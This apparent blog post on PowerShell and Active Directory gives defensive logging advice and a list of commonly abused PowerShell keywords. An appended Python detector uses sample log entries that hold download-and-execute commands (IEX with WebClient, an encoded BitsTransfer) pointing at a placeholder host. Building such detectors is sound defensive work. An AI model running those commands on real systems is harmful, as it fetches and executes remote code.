PowerShell Remote Control

Asphyxia

Remember games where you could set "ghost", "ammo 9999", and "god"?

Walk through the walls, never die, and infinite ammo!?

Let's do that with Windows 10!

Go get RSAT (Remote Server Administration Tools) and install it.

Restart your machine and play with computers and users.

More coming soon; this is a work in progress. There are also ways to recon AD (Active Directory) from Linux.

Want strong defense? Turn up logging - especially for Command Line, PowerShell, and WMI. Are you going to do full PCAP or NetFlow? Don't DoS your logging capabilities by turning up logging too hardcore. Actually, never go too hard.

Antivirus does not measure causality. Turn on process tracking, then enable Command Line auditing. If someone drops in through PowerShell or Command Prompt, every line will be captured. DO NOT turn on Process Tracking across AN entire deployment; only use it on systems where there is CONFIRMED/LIKELY malicious activity and you have event log forwarding set up to handle the heavy blasting of logs. Sysmon is an alternative but still needs to be tuned. Endpoint detection and response (EDR) is beneficial to help alert on possible attacks and allow one to take care of them quickly.

You have to turn on the PowerShell auditing feature (group policy). Commonly abused keywords: "download, IEX, powershell -version, start-process, invoke-expression, http, bitstransfer, WebClient, FromBase64String, rundll32". Any encoding or obfuscation is also a red flag.

Take any obfuscated PowerShell script, toss it into https://gchq.github.io/CyberChef/, and you may have a very happy day.
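As an added illustration of the keyword-based PowerShell auditing the post recommends (example code, not from the post): a small Python scanner that runs the listed keywords over constructed Script Block Logging entries and also unpacks `-EncodedCommand` arguments, so an encoded command cannot hide the keywords from the match. The event shape, the sample commands and the `placeholder.invalid` host are all constructed.

```python
import base64
import re

# Keywords the post lists as commonly abused (matched case-insensitively).
SUSPICIOUS_KEYWORDS = [
    "download", "iex", "powershell -version", "start-process", "invoke-expression",
    "http", "bitstransfer", "webclient", "frombase64string", "rundll32",
]
# The -EncodedCommand switch (or a short form) followed by a base64 blob.
ENCODED_CMD_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(text):
    """Plaintext behind -EncodedCommand (base64 over UTF-16LE), or None if absent/invalid."""
    m = ENCODED_CMD_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_script_block(text):
    """Sorted suspicious keywords found in one script block, raw and decoded."""
    hits = set()
    decoded = decode_encoded_command(text)
    for candidate in (text, decoded or ""):
        hits.update(k for k in SUSPICIOUS_KEYWORDS if k in candidate.lower())
    if decoded is not None:
        hits.add("encodedcommand")  # the encoding itself is a red flag, as the post notes
    return sorted(hits)


def scan_events(events):
    """Map event index -> hits, keeping only events that matched at least once."""
    scanned = {i: scan_script_block(t) for i, t in enumerate(events)}
    return {i: h for i, h in scanned.items() if h}


def _encode(command):  # builds a constructed -EncodedCommand argument for the sample below
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed samples in the shape of Event ID 4104 ScriptBlockText; not real captures.
SAMPLE_EVENTS = [
    "Get-ChildItem C:\\Users | Sort-Object Length",
    "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/a.ps1')",
    "powershell -nop -w hidden -enc "
    + _encode("Start-BitsTransfer -Source http://placeholder.invalid/x -Destination C:\\x"),
]
```

On a live host the same scan would be fed from the Microsoft-Windows-PowerShell/Operational log (Event ID 4104) once Script Block Logging is enabled by the group policy the post mentions.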